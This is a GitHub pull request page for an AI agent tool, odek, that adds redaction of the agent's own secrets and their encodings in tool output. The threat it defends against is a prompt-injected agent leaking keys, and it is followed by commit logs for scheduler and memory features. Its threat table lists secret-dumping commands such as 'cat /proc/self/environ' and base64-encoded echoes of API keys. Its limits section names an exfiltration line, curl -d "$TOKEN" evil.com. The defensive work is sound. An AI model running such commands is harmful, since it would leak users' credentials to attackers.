fix(redact): close secret-leak gaps on the tool output surface by jkyberneees · Pull Request #4 · BackendStack21/odek

jkyberneees · 2026-06-03T07:16:30Z

Problem

Tool output is redacted before it enters the transcript/session (internal/loop/loop.go:926), but the matcher is pattern-based — it only catches secrets whose format it recognises. That leaves real leak paths a prompt-injected agent can use:

Vector	Example	Before
Bare echo of a non-standard-format secret	`echo $TELEGRAM_BOT_TOKEN`	leaked (no `name=` context, shape unknown)
Encoded secret	`echo $API_KEY \| base64` / `xxd` / `rev`	leaked (value no longer matches any regex)
`/proc` environ dump	`cat /proc/self/environ`	partial

Scrubbing the process env is not an option — the agent needs its keys (above all the LLM API key) to function. So the fix belongs on the tool output surface.

Fix

A known-value redaction layer that complements the existing format patterns:

odek registers its own secrets at startup — resolved API key, Telegram bot token, and env vars with a secret-bearing name segment (config.LoadConfig; FD-supplied key in the subagent path).
Those exact values and their common encodings (base64 std/raw/url, hex, percent, reversed) are redacted wherever they appear, regardless of format — closing all three vectors for odek's own secrets.
Added a Telegram bot-token format pattern for tokens we don't hold.

Safety of the heuristic:

Env-name matching is on whole _/- segments, so GIT_AUTHOR_NAME (AUTHOR) / compass (PASS) are not treated as secrets.
Values under 8 chars are ignored (no over-redaction of ordinary text).
Matching is literal (strings.Replacer) — no regex metachar / ReDoS risk from arbitrary secret contents.

Honest limits (documented, not fixed here)

Redaction is a disclosure safety net, not an exfil guarantee. Arbitrary transformations (gzip, openssl enc, char-substitution) and side-channel exfiltration (curl -d "$TOKEN" evil.com, reverse shells, DNS tunnelling) never reach — or bypass — the tool surface, and stay the job of the network-egress controls (network_egress: prompt + non_interactive: deny + the egress denylist). See docs/REDACTION_HARDENING.md for the full threat model and the follow-up roadmap (streaming-boundary redaction, entropy heuristic for third-party secrets, redaction telemetry).

Tests

go test ./internal/redact/ — new coverage in known_value_test.go for each closed vector, env-scan selectivity, and the short-value guard. Touched packages (redact, config, loop, cmd/odek) all pass; go vet clean.

🤖 Generated with Claude Code

Tool output is redacted before it enters the transcript, but the format-pattern matcher only catches secrets whose shape it recognises. Three gaps let secrets through: - a bare echo of a non-standard-format secret (e.g. a Telegram bot token, which has no name= context for the generic rule) - a trivially encoded secret (echo $KEY | base64 / xxd / rev) - a /proc/self/environ dump (NUL-delimited, no NAME= for the rule) Add a known-value redaction layer: odek registers its own secrets (the LLM API key, the Telegram bot token, sensitively-named env vars) at startup and redacts those exact values plus their common encodings (base64, hex, percent, reversed), regardless of format. This is the reliable layer for odek's own secrets; the format patterns stay for secrets we don't hold but recognise by shape. Also add a Telegram bot-token pattern. Env scanning matches whole _/- segments so GIT_AUTHOR_NAME and the like are not mistaken for secrets; values under 8 chars are ignored to avoid over-redaction. Matching is literal (strings.Replacer) — no ReDoS risk from arbitrary secret contents. The agent process keeps its keys (it needs them to talk to the model); this only stops them leaking back out through tool output. Side-channel exfiltration and arbitrary transformations remain the job of the network-egress controls — documented in docs/REDACTION_HARDENING.md. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

@macros

#7) * feat(schedule): native in-process scheduler core (phase 1) Introduce internal/schedule — the engine for odek's native cron capability, replacing the Docker + supercronic approach. Running in-process means the host already has resolved config (API key, model, bot token, default chat) in memory, so a scheduled task sees exactly what an interactive one does — no environment-inheritance games, no external cron daemon, no container-only behaviour. This phase is the standalone core only — no CLI or bot wiring yet. - types.go: Job / Delivery / RunState. Definitions and runtime state persist to separate files so a hand-edit never races a state write. - cronexpr.go: stdlib-only 5-field cron parser (ranges, steps, lists, names, @macros) with correct Vixie dom/dow union semantics, timezone-aware Next() via coarse unit-stepping, and a horizon that clears the leap-century gap. - store.go: atomic (temp+rename, 0600) CRUD for schedules.json and schedule-state.json, mirroring session.Store; validates jobs on write. - scheduler.go: firing engine decoupled from the agent/telegram via Runner and Deliverer interfaces. Earliest-fire timer (no per-minute polling), bounded concurrency, per-job overlap guard, missed-run skip/catchup policy, mtime hot-reload, and graceful drain on context cancellation. Tests: 39 cases, 87.9% coverage, green under -race. Parser table tests (ranges/steps/lists/names/macros/dom-dow union/leap day/timezone/errors); engine tests drive reconcile/fireDue directly with explicit clocks plus one real-clock lifecycle test — deterministic, no flaky sleeps. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(schedule): odek schedule CLI + headless runner/deliverers (phase 2) Wire the scheduler core into the CLI and give it a way to actually run tasks. - cmd/odek/schedule.go: `odek schedule <list|add|rm|enable|disable|run|next|daemon>`. * add: flag-parsed (--name/--cron/--deliver/--tz/--catchup/--disabled) with a trailing task; validates and shows the next fire. * list: tabular view with computed next-fire (local time) and last status. * next: previews upcoming fires for a job ID or a raw expression. * run: fires one job immediately and delivers (test a job). * daemon: foreground scheduler with a singleton pid lock (refuses a second instance rather than usurping a live one) and graceful SIGINT/SIGTERM drain. - runTaskHeadless: builds a fresh agent with a silent (io.Discard) renderer, interaction off, and no approver — the resolved danger policy governs what an unattended task may do, mirroring non-interactive `odek run`. - agentRunner / cliDeliverer implement the schedule.Runner / schedule.Deliverer interfaces; delivery routes to stdout, ~/.odek/schedule.log, or Telegram (honouring a per-job chat ID, falling back to default_chat_id). - dispatch + printUsage wired for the new command. Tests cover parseDeliver, deliverString, firstWords, jobSchedule, and the deliverer branches (log append, telegram misconfig errors, unknown kind). Smoke-tested end to end: add/list/next/enable/disable/rm, schedules.json at 0600, and daemon start → second-instance refused → clean SIGINT drain. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(schedule): run the scheduler inside odek telegram (phase 3) The Telegram bot now hosts the scheduler in-process, so reminders and the bot share one runtime — the whole reason to go native. No separate cron daemon, no environment-inheritance problem. - startSchedulerForBot: launched after the poller, stopped on ctx cancel. It acquires the shared schedule pid-lock; if an external `odek schedule daemon` already holds it, the bot defers (logs and skips) rather than double-firing. - telegramRunner: runs each job headless and accounts token usage against the bot's daily budget — pre-flight refuse when exhausted, bill the run after. - telegramDeliverer: delivers via the LIVE bot for telegram jobs (sharing its client and 429 backoff) and falls back to the CLI deliverer for stdout/log. - runTaskHeadless now captures cumulative tokens via an IterationCallback, so the Runner's token count is real (engine logs it; bot bills it). - Graceful restart releases the schedule lock before os.Exit, mirroring the Telegram instance lock, so the restarted child's scheduler re-acquires cleanly. Tests: embedded deliverer routing — live-bot send, default-chat fallback, no-chat error, and stdout/log fallback — via the recording test bot. Full cmd/odek suite green under -race; whole module suite green, vet + fmt clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(schedule): schedules config section + docs (phase 4) Make the scheduler configurable and documented. - internal/config: new `schedules` section (enabled, max_concurrent, timezone, catchup) with the same file→env→default layering as every other section. resolveSchedules + ODEK_SCHEDULES_* env overrides + overlayFile handling. Defaults: enabled=true, max_concurrent=2, timezone=UTC, catchup=false. - cmd/odek: the daemon and the embedded (bot) scheduler now build their engine Options from resolved.Schedules via a shared schedulerOptions helper (max-concurrent, default timezone, catchup). The embedded scheduler is gated on schedules.enabled so it can be turned off in favour of a standalone daemon. - docs: new docs/SCHEDULES.md (canonical guide — runtime models, CLI, cron syntax incl. Vixie dom/dow coupling, delivery, the unattended-safety policy, config, missed-run behaviour); a Schedules section in CONFIG.md; a feature bullet in README. Tests: resolveSchedules defaults/overrides/partial, and LoadConfig wiring for defaults and ODEK_SCHEDULES_* env. Full config + schedule + cmd suites green, vet + fmt clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(docker): retire supercronic, use the native scheduler (phase 5) The bot now hosts the in-process scheduler (phase 3), so the container needs no external cron at all. Remove the supercronic scaffolding entirely. - Dockerfile: drop the supercronic download (and its ARG TARGETARCH/SHA pin), the ~/.crontabs dir, and the cron-entrypoint.sh wrapper. ENTRYPOINT is back to ["odek"]. The image no longer needs --build-arg TARGETARCH. - docker-compose: remove the ./crontab bind mounts from both telegram services. Keep init: true (now justified generally — reap agent-spawned children and forward SIGTERM), with an honest comment. - Delete docker/cron-entrypoint.sh and docker/crontab. - spawnChild: remove the now-dead ODEK_ENTRYPOINT re-exec branch (it only existed to restart supercronic via the wrapper). A restarted `odek telegram` starts its own embedded scheduler goroutine; gracefulRestart still releases the schedule lock so the child re-acquires cleanly. Drop the two obsolete ODEK_ENTRYPOINT tests. - docs: docker/README + .env.example now describe the native scheduler (`odek schedule`, jobs in ./.odek/schedules.json); TELEGRAM.md points to SCHEDULES.md from its OS-cron section. Validated: image builds without TARGETARCH, supercronic absent from the image, ENTRYPOINT runs odek, and `odek schedule next` works inside the container. Compose config valid; full module suite green, vet + fmt clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * fix(schedule): address code-review findings Ten findings from the high-effort review of the native scheduler: #1 (security) Unattended tasks could silently run dangerous ops: a nil approver with no TTY falls back to NonInteractiveAction(), which defaults to ALLOW. Set a "deny" floor in runTaskHeadless when the policy doesn't explicitly choose one (mirrors sub-agent hardening); explicit allow/deny (godmode/restricted) honoured. #2 (correctness) cron parseField flagged a dom/dow field as a wildcard whenever it merely started with "*", so a list like "*/2,15" broke the Vixie union rule (AND instead of OR). Now star is set only when EVERY comma item is wildcard-based. #3 (correctness) The Run loop did a blocking `sem <- {}` in fireDue, so MaxConcurrent hung jobs wedged shutdown/reload. Now the sem acquire selects on ctx (clearing the overlap guard for undispatched jobs), and each run is bounded by Options.RunTimeout (default 15m). #4 (correctness) Budget pre-check used CheckDailyBudget(1), which persists +1 per fire. Switched to read-only DailyTokenUsage() for the gate; actual cost still billed after the run. #5 (robustness) acquireScheduleLock now does a /proc/<pid>/cmdline identity check so a recycled PID can't make the scheduler refuse to start forever; pid file tightened to 0600. #6 (correctness) Missed-run detection trusted a persisted NextRun even after the cron changed while down. RunState now records the schedule signature; reconcile ignores NextRun when the sig differs (no spurious catchup/skip). #7 (efficiency) MCP servers were reconnected per fire. They're now connected once at daemon/bot startup and shared across fires (the MCP client is mutex-safe); builtin tools stay fresh per fire. #8 (efficiency) reconcile re-parsed cron + LoadLocation for unchanged jobs every reload. The sig short-circuit now runs before compile(). #9 (cleanup) Hoisted the repeated `cfg.Schedules == nil` guard in loader.go. #10 (cleanup) Daemon reuses telegram.NewFileLogger instead of a hand-rolled stderrLogger (deleted). Tests: cron union for step-lists + plain-step-still-wildcard; cron-changed-while- down (no false catchup); fireDue unblocks on ctx cancel with a full semaphore. Full suite green under -race, vet + fmt clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * fix(schedule): address ultrareview findings Nine findings from the cloud multi-agent review. bug_005 (normal) Impossible cron expressions (e.g. "0 0 30 2 *", Feb 30) passed Validate but Next() returns the zero time, which the engine treated as perpetually due → fired every tick forever, burning tokens. Now Validate rejects them at add time, and reconcile/fireDue defensively skip a zero next-fire (for hand-edited files). bug_009 (normal) The embedded scheduler's stop closure tore down shared MCP connections and the lock without waiting for in-flight jobs to drain, causing broken-pipe errors persisted as bogus failure state. The closure now waits on a done channel (20s bound) before cleanup. bug_013 (normal) gracefulRestart calls os.Exit(0), which skips deferred stopScheduler → mcpCleanup never ran → MCP child processes (Playwright/Chromium) leaked on every /restart. Added mcpCleanupRef, invoked before os.Exit like scheduleUnlockRef. bug_007 (normal) reconcile reseeded s.runs from disk in the unchanged branch, clobbering an in-flight fire's increment → lost Runs counts. It now skips the reseed for unchanged/running jobs. Also moved the missed-fire SaveState out of the s.mu critical section and stopped swallowing its error. bug_004 (normal) runTaskHeadless used RunWithMessages with a bare system message, so RuntimeContext (host/cwd/date) never reached the LLM — date-aware jobs ("summarize today's calendar") had no notion of "today". Switched to agent.Run, which prepends the engine's runtime-context-inclusive system message. bug_014 (nit) Deliverer.Deliver took no context, so a stuck Telegram send blocked the drain. Added ctx to the interface + bot.SendMessageContext; the scheduler passes the run ctx through. bug_015 (nit) Concurrent CLI mutations could lose writes (read-modify-write with only an in-process mutex). Added an flock on ~/.odek/schedules.lock around the store's write methods. bug_006 (nit) scheduleNext swallowed store errors → misleading "bad cron" on a corrupt store. It now returns the store error. bug_002 (nit) docker/README + SCHEDULES.md misdescribed the lock as symmetric; reworded to note the bot defers silently while the daemon refuses to start. Tests: impossible-cron rejected (Validate) + skipped (reconcile); unchanged reconcile preserves in-memory Runs. Full suite green under -race, vet + fmt clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * test(schedule): cover error paths and edge cases to 99.6% Add targeted tests for the native scheduler package and its CLI glue, raising internal/schedule statement coverage from 87.8% to 99.6% (the only remaining gap is the best-effort flock syscall-error fallback). internal/schedule/coverage_test.go exercises: - store error paths: NewStore HOME failure, NewStoreAt mkdir failure, corrupt-file loadDoc/loadState propagation across all CRUD methods, writeJSONAtomic marshal/write/rename failures, version defaulting, null states map, fileLock open failure, and the List ID tiebreak. - scheduler branches: reload-on-mtime-change, reconcile List/LoadState errors, skip- and execute-time SaveState failures, zero next-fire drop, timeToNext empty/past/near cases, compile bad-timezone, and preview truncation. - cronexpr branches: nil-location default, empty field, range/empty value parse errors, and a month mismatch in Matches. cmd/odek/schedule_cli_test.go covers the non-LLM CLI surface: list, add, rm, enable/disable, next, command dispatch, scheduler options, MCP no-op, schedule lock acquire/release, embedded-scheduler lifecycle, and the telegram budget gate. * docs: make docs consistent with the native scheduler The native scheduler landed with its own docs (SCHEDULES.md, CONFIG.md, TELEGRAM.md, docker/*) but left a few cross-references stale or missing. Bring the rest of the docs in line: - README.md: add the missing Scheduled Tasks row to the docs index (the feature section already linked SCHEDULES.md). - docs/index.html: add a Scheduled Tasks feature card mirroring README. - docs/CLI.md: list 'odek schedule' (and the previously-omitted 'odek telegram') in the command table; point '--deliver' at the native scheduler for recurring tasks. - docs/CHEATSHEET.md: add a schedule quick-reference (and telegram). - docs/DAILY-WORKER.md: correct the comparison table — odek now has native, in-process scheduling rather than 'None'. * feat(schedule): manage schedules from Telegram Add /schedules and /schedule slash commands so an authorized Telegram user can list, view, preview, add, enable/disable, remove, and test-run scheduled tasks without leaving the chat — closing the gap where the native scheduler was CLI/file-only. Command layer (cmd/odek/schedule_telegram.go): - /schedules lists jobs; /schedule <sub> dispatches add|view|next|run| enable|disable|rm|help. - add uses cron's fixed arity (an @macro or 5 fields) so no quoting is needed; options follow a literal '|' (deliver=, tz=, name=, catchup, disabled). Telegram delivery defaults to the originating chat. - run returns the job's task for the bot to dispatch through the normal agent pipeline (progress + approvals visible), test-running it in chat. - Replies use the existing MarkdownV2 pipeline; cron/IDs are wrapped in code spans to stay literal. Wiring: - Scheduler gains Reload() (buffered, coalescing) and a select case so in-chat edits reconcile immediately instead of waiting for the mtime poll; startSchedulerForBot now takes the shared store and publishes its Reload via scheduleReloadRef. - telegram.go creates one schedule.Store, shares it with the embedded scheduler, and intercepts the two commands in OnCommand. Safety/config: - New schedules.allow_telegram_management (default true, env ODEK_SCHEDULES_ALLOW_TELEGRAM_MANAGEMENT) gates the mutating verbs; read-only listing/preview always works. Access is already bounded by the bot's allowed_chats/allowed_users. Docs: SCHEDULES.md gains a 'Managing from Telegram' section; TELEGRAM.md, CONFIG.md, docker/README.md and .env.example updated. Tests cover the parser, every subcommand, the management gate, and the Reload trigger. * fix(schedule): format scheduled results for Telegram MarkdownV2 Scheduled task results were sent raw, so odek markdown like **bold** arrived as literal asterisks. Route both the CLI and embedded-bot deliverers through sendTelegramResult, which mirrors the live bot's SendResponse pipeline: convert to MarkdownV2, chunk via FormatResponse, and retry each chunk as plain text if Telegram rejects the formatting. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

…ty (#12) * feat(memory): persisted go-vector episode index + featurization quality Fixes the two remaining memory weaknesses using only the existing go-vector library — no new embedding dependency. **#4 — per-turn LLM call eliminated.** FormatEpisodeContext previously called episodes.Search → NewLLMRanker → one llm.SimpleCall per turn. The RP fallback was no better at scale: NewRPRanker re-instantiated RandomProjections and re-fit + re-embedded every episode on every Search call (no caching). New episodeVectorIndex (mirroring session/vector_index.go) persists a go-vector Store + RandomProjections embedder to gob files. FormatEpisodeContext now calls episodes.recallByVector → sharedEpisodeIndex.search → embed query + N cached cosines. Zero LLM calls on the per-turn path. Design: dirty-flag + full rebuild. RP must be Fit on the full corpus to produce a valid vocabulary — incremental embedding after a stale Fit yields degenerate vectors. Episodes are written at session-end (infrequent); rebuild is triggered on the next search after any write, then cached for all subsequent turns until the next write. One O(n) rebuild per session-end, then µs cosine per turn. Process-wide singleton per memory directory (sharedEpisodeIndex, mirroring factsDirLock) prevents concurrent serve.go per-connection managers from racing on the gob files. SearchEpisodes (explicit memory tool) now fetches candidates from the vector index and LLM-reranks only those candidates (bounded), fixing the O(n)·LLM cost in the explicit search path too. llm_search now gates explicit search reranking only — per-turn recall always uses RP. **#3 — featurization quality.** New featurize.go: normalizeForEmbedding (lowercase + alphanumeric tokens, strips punctuation so "Postgres," == "postgres") + featurizeForEmbedding (normalise + bigrams "w1_w2" for light local word order). Applied at the go-vector boundary in both the episode index (full ~1KB on-disk summaries, up from 120-char truncated; 256 dims, up from 64) and MergeDetector.Fit/ Classify/AppendEntry/ReplaceEntry. Raw strings are preserved in m.corpus; only the RP boundary uses featurized text. Verified: FormatEpisodeContext fires zero LLM calls; postgres vs mysql episodes rank distinctly; postgres vs "database is postgres" ranks similar; persistence round-trips; dirty rebuild picks up new episodes; provenance filter holds; concurrent safety under -race; all existing tests green. Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com> * fix(memory): close verification findings on episode vector index (D-04/D-05/D-06) Remediates the AI Verification Protocol findings on PR #12. D-05 (OOV zero-score bypass): when a query has no vocabulary overlap with the episode corpus, go-vector Embed returns a zero vector and Store.Search returns k results all with cosine similarity=0. recallByVector was returning those as non-empty candidates, so SearchEpisodes skipped the LLM fallback with noise. Fix: filter zero-score results in recallByVector before returning; an all-OOV query now returns nil, correctly triggering the fallback path in SearchEpisodes. D-06 (SearchEpisodes at 52.9% coverage): four branches untested. Added: llm_search=false (no LLM), nil LLM client, limit truncation, rankFn error fallback, and OOV query triggering the nil-then-fallback path. Coverage now 76.5%. D-04 (multi-process caveat undocumented): the in-process singleton serializes concurrent MemoryManagers within one process, but two separate odek processes sharing ~/.odek/memory are not serialized. Added explicit documentation to the singleton var block explaining the limitation and its bounded impact. D-01/D-02/D-03/D-07/D-08/D-09 confirmed held (no fix needed): double-checked locking is correct; per-TempDir tests prevent singleton bleed; corrupted emb gob falls back to rebuild; featurization is symmetric across all Fit/Embed paths. Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com> --------- Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>

jkyberneees merged commit 681bcd9 into main Jun 3, 2026
6 checks passed

jkyberneees deleted the fix/redact-known-value-leaks branch June 6, 2026 06:37

jkyberneees mentioned this pull request Jun 6, 2026

feat(memory): persisted go-vector episode index + featurization quality #12

Merged

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

fix(redact): close secret-leak gaps on the tool output surface#4

fix(redact): close secret-leak gaps on the tool output surface#4
jkyberneees merged 1 commit into
mainfrom
fix/redact-known-value-leaks

jkyberneees commented Jun 3, 2026

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

Conversation

jkyberneees commented Jun 3, 2026

Problem

Fix

Honest limits (documented, not fixed here)

Tests

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant